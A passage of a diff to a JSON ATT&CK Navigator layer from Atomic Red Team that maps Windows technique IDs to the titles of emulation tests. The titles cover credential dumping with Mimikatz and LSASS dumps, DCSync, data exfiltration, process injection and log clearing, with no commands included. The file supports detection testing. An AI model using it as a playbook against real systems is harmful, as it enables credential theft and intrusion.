Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":2,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n- Enumerate Windows Security Log via WevtUtil\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":40,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using 
Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n- Create Volume Shadow Copy with diskshadow\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using 
nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and 
Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"comment":"\n- Network-Based Data Transfer in Small Chunks\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections 
Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process 
Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell 
Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n- SOAPHound - Dump BloodHound Data\n- SOAPHound - Build Cache\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- 
